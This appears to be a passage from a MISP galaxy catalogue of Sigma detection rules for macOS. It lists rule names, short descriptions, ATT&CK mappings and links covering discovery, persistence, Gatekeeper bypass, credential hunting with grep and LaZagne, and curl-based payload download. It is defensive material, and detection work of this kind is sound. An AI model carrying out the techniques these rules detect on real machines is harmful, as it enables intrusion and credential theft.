https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml

OSACompile Run-Only Execution

Detects potentially suspicious execution of run-only scripts compiled using OSACompile

The tag is: misp-galaxy:sigma-rules="OSACompile Run-Only Execution"

OSACompile Run-Only Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

Table 11435. Table References

Links

https://ss64.com/osx/osacompile.html

https://redcanary.com/blog/applescript/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_osacompile_runonly_execution.yml

System Integrity Protection (SIP) Enumeration

Detects the use of csrutil to view the System Integrity Protection (SIP) status. This technique is used in post-exploitation scenarios.

The tag is: misp-galaxy:sigma-rules="System Integrity Protection (SIP) Enumeration"

System Integrity Protection (SIP) Enumeration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 11436. Table References

Links

https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior

https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/

https://objective-see.org/blog/blog_0x6D.html

https://ss64.com/osx/csrutil.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml

System Information Discovery Using sw_vers

Detects the use of "sw_vers" for system information discovery

The tag is: misp-galaxy:sigma-rules="System Information Discovery Using sw_vers"

System Information Discovery Using sw_vers has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11437. Table References

Links

https://ss64.com/osx/sw_vers.html

https://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior

https://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_swvers_discovery.yml

System Integrity Protection (SIP) Disabled

Detects the use of csrutil to disable System Integrity Protection (SIP). This technique is used in post-exploitation scenarios.

The tag is: misp-galaxy:sigma-rules="System Integrity Protection (SIP) Disabled"

System Integrity Protection (SIP) Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 11438. Table References

Links

https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior

https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/

https://objective-see.org/blog/blog_0x6D.html

https://ss64.com/osx/csrutil.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml

Screen Capture - macOS

Detects attempts to use screencapture to collect macOS screenshots

The tag is: misp-galaxy:sigma-rules="Screen Capture - macOS"

Screen Capture - macOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 11439. Table References

Links

https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml

Clipboard Data Collection Via OSAScript

Detects possible collection of data from the clipboard via execution of the osascript binary

The tag is: misp-galaxy:sigma-rules="Clipboard Data Collection Via OSAScript"

Clipboard Data Collection Via OSAScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

Table 11440. Table References

Links

https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clipboard_data_via_osascript.yml

System Information Discovery Using Ioreg

Detects the use of "ioreg", which shows I/O Kit registry information. This process is used for system information discovery. It has been observed in the wild both invoked directly and through bash and grep to look for specific strings.

The tag is: misp-galaxy:sigma-rules="System Information Discovery Using Ioreg"

System Information Discovery Using Ioreg has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11441. Table References

Links

https://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html

https://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior

https://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior

https://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml

File and Directory Discovery - MacOS

Detects usage of system utilities to discover files and directories

The tag is: misp-galaxy:sigma-rules="File and Directory Discovery - MacOS"

File and Directory Discovery - MacOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11442. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml

MacOS Scripting Interpreter AppleScript

Detects execution of scripts written in AppleScript, the macOS scripting language.

The tag is: misp-galaxy:sigma-rules="MacOS Scripting Interpreter AppleScript"

MacOS Scripting Interpreter AppleScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

Table 11443. Table References

Links

https://redcanary.com/blog/applescript/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_applescript.yml

Osacompile Execution By Potentially Suspicious Applet/Osascript

Detects a potentially suspicious applet or osascript process executing "osacompile".

The tag is: misp-galaxy:sigma-rules="Osacompile Execution By Potentially Suspicious Applet/Osascript"

Osacompile Execution By Potentially Suspicious Applet/Osascript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

Table 11444. Table References

Links

https://redcanary.com/blog/mac-application-bundles/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_suspicious_applet_behaviour.yml

Gatekeeper Bypass via Xattr

Detects macOS Gatekeeper bypass via xattr utility

The tag is: misp-galaxy:sigma-rules="Gatekeeper Bypass via Xattr"

Gatekeeper Bypass via Xattr has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1553.001" with estimative-language:likelihood-probability="almost-certain"

Table 11445. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.001/T1553.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml

Root Account Enable Via Dsenableroot

Detects attempts to enable the root account via "dsenableroot"

The tag is: misp-galaxy:sigma-rules="Root Account Enable Via Dsenableroot"

Root Account Enable Via Dsenableroot has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"

Table 11446. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md

https://ss64.com/osx/dsenableroot.html

https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dsenableroot_enable_root_account.yml

MacOS Network Service Scanning

Detects enumeration of local or remote network services.

The tag is: misp-galaxy:sigma-rules="MacOS Network Service Scanning"

MacOS Network Service Scanning has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 11447. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml

Suspicious Browser Child Process - MacOS

Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.

The tag is: misp-galaxy:sigma-rules="Suspicious Browser Child Process - MacOS"

Suspicious Browser Child Process - MacOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11448. Table References

Links

https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml

https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_browser_child_process.yml

JAMF MDM Potential Suspicious Child Process

Detects potentially suspicious child processes of "jamf". This could be a sign of Jamf being abused as a C2 server, as seen with the Typhon MythicAgent.

The tag is: misp-galaxy:sigma-rules="JAMF MDM Potential Suspicious Child Process"

Table 11449. Table References

Links

https://www.zoocoup.org/casper/jamf_cheatsheet.pdf

https://github.com/MythicAgents/typhon/

https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jamf_susp_child.yml

Suspicious Execution via macOS Script Editor

Detects when the macOS Script Editor utility spawns an unusual child process.

The tag is: misp-galaxy:sigma-rules="Suspicious Execution via macOS Script Editor"

Suspicious Execution via macOS Script Editor has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Subvert Trust Controls - T1553" with estimative-language:likelihood-probability="almost-certain"

Table 11450. Table References

Links

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685

https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml

Potential Persistence Via PlistBuddy

Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via PlistBuddy"

Potential Persistence Via PlistBuddy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"

Table 11451. Table References

Links

https://www.manpagez.com/man/8/PlistBuddy/

https://redcanary.com/blog/clipping-silver-sparrows-wings/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_persistence_via_plistbuddy.yml

Guest Account Enabled Via Sysadminctl

Detects attempts to enable the guest account using the sysadminctl utility

The tag is: misp-galaxy:sigma-rules="Guest Account Enabled Via Sysadminctl"

Guest Account Enabled Via Sysadminctl has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001" with estimative-language:likelihood-probability="almost-certain"

Table 11452. Table References

Links

https://ss64.com/osx/sysadminctl.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml

Binary Padding - MacOS

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to add junk data to a file.

The tag is: misp-galaxy:sigma-rules="Binary Padding - MacOS"

Binary Padding - MacOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

Table 11453. Table References

Links

https://linux.die.net/man/1/dd

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md

https://linux.die.net/man/1/truncate

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml

Creation Of A Local User Account

Detects the creation of a new user account. Such accounts may be used for persistence without requiring persistent remote access tools to be deployed on the system.

The tag is: misp-galaxy:sigma-rules="Creation Of A Local User Account"

Creation Of A Local User Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 11454. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md

https://ss64.com/osx/sysadminctl.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml

System Information Discovery Using System_Profiler

Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.

The tag is: misp-galaxy:sigma-rules="System Information Discovery Using System_Profiler"

System Information Discovery Using System_Profiler has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

Table 11455. Table References

Links

https://ss64.com/mac/system_profiler.html

https://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by-macos-threat-actors-malware.pdf

https://objective-see.org/blog/blog_0x62.html

https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/

https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af

https://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml

Potential Discovery Activity Using Find - MacOS

Detects usage of the "find" binary in a suspicious manner to perform discovery

The tag is: misp-galaxy:sigma-rules="Potential Discovery Activity Using Find - MacOS"

Potential Discovery Activity Using Find - MacOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11456. Table References

Links

https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml

Hidden User Creation

Detects creation of a hidden user account on macOS (UserID < 500) or with the IsHidden option

The tag is: misp-galaxy:sigma-rules="Hidden User Creation"

Hidden User Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002" with estimative-language:likelihood-probability="almost-certain"

Table 11457. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml

Suspicious History File Operations

Detects command-line operations on shell history files

The tag is: misp-galaxy:sigma-rules="Suspicious History File Operations"

Suspicious History File Operations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bash History - T1552.003" with estimative-language:likelihood-probability="almost-certain"

Table 11458. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml

Potential Base64 Decoded From Images

Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.

The tag is: misp-galaxy:sigma-rules="Potential Base64 Decoded From Images"

Potential Base64 Decoded From Images has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 11459. Table References

Links

https://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior

https://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_tail_base64_decode_from_image.yml

System Network Connections Discovery - MacOs

Detects usage of system utilities to discover system network connections

The tag is: misp-galaxy:sigma-rules="System Network Connections Discovery - MacOs"

System Network Connections Discovery - MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 11460. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml

System Network Discovery - macOS

Detects enumeration of local network configuration

The tag is: misp-galaxy:sigma-rules="System Network Discovery - macOS"

System Network Discovery - macOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 11461. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_discovery.yml

Potential XCSSET Malware Infection

Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.

The tag is: misp-galaxy:sigma-rules="Potential XCSSET Malware Infection"

Table 11462. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml

Credentials In Files

Detects attempts to extract passwords with grep and LaZagne

The tag is: misp-galaxy:sigma-rules="Credentials In Files"

Credentials In Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 11463. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml

User Added To Admin Group Via Dscl

Detects attempts to create and add an account to the admin group via "dscl"

The tag is: misp-galaxy:sigma-rules="User Added To Admin Group Via Dscl"

User Added To Admin Group Via Dscl has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"

Table 11465. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos

https://ss64.com/osx/dscl.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dscl_add_user_to_admin_group.yml

File Time Attribute Change

Detects file time attribute changes made to hide new files or changes to existing files

The tag is: misp-galaxy:sigma-rules="File Time Attribute Change"

File Time Attribute Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 11466. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml

Payload Decoded and Decrypted via Built-in Utilities

Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.

The tag is: misp-galaxy:sigma-rules="Payload Decoded and Decrypted via Built-in Utilities"

Payload Decoded and Decrypted via Built-in Utilities has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 11467. Table References

Links

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml

Space After Filename - macOS

Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.

The tag is: misp-galaxy:sigma-rules="Space After Filename - macOS"

Space After Filename - macOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Space after Filename - T1036.006" with estimative-language:likelihood-probability="almost-certain"

Table 11468. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_space_after_filename.yml

Potential In-Memory Download And Compile Of Payloads

Detects potential in-memory downloading and compiling of applets using curl and osacompile, as used by the XCSSET malware

The tag is: misp-galaxy:sigma-rules="Potential In-Memory Download And Compile Of Payloads"

Potential In-Memory Download And Compile Of Payloads has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11469. Table References

Links

https://redcanary.com/blog/mac-application-bundles/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_in_memory_download_and_compile.yml

Local Groups Discovery - MacOs

Detects enumeration of local system groups

The tag is: misp-galaxy:sigma-rules="Local Groups Discovery - MacOs"

Local Groups Discovery - MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 11470. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_groups.yml

Scheduled Cron Task/Job - MacOs

Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.

The tag is: misp-galaxy:sigma-rules="Scheduled Cron Task/Job - MacOs"

Scheduled Cron Task/Job - MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

Table 11471. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml

Decode Base64 Encoded Text -MacOs

Detects usage of the base64 utility to decode arbitrary base64-encoded text.

The tag is: misp-galaxy:sigma-rules="Decode Base64 Encoded Text -MacOs"

Decode Base64 Encoded Text -MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 11472. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml

Macos Remote System Discovery

Detects the enumeration of other remote systems.

The tag is: misp-galaxy:sigma-rules="Macos Remote System Discovery"

Macos Remote System Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 11473. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml

User Added To Admin Group Via DseditGroup

Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.

The tag is: misp-galaxy:sigma-rules="User Added To Admin Group Via DseditGroup"

User Added To Admin Group Via DseditGroup has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"

Table 11474. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos

https://ss64.com/osx/dseditgroup.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dseditgroup_add_to_admin_group.yml

Split A File Into Pieces

Detects use of the command "split" to split files into parts, possibly in preparation for transfer.

The tag is: misp-galaxy:sigma-rules="Split A File Into Pieces"

Split A File Into Pieces has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"

Table 11475. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml

Suspicious Installer Package Child Process

Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters

The tag is: misp-galaxy:sigma-rules="Suspicious Installer Package Child Process"

Suspicious Installer Package Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11476. Table References

Links

https://redcanary.com/blog/clipping-silver-sparrows-wings/

https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_installer_susp_child_process.yml

GUI Input Capture - macOS

Detects attempts to use system dialog prompts to capture user credentials

The tag is: misp-galaxy:sigma-rules="GUI Input Capture - macOS"

GUI Input Capture - macOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"

Table 11477. Table References

Links

https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/

